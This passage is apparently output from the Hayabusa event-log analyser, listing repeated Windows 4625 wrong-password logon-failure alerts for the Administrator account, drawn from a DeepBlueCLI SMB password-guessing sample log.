NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: 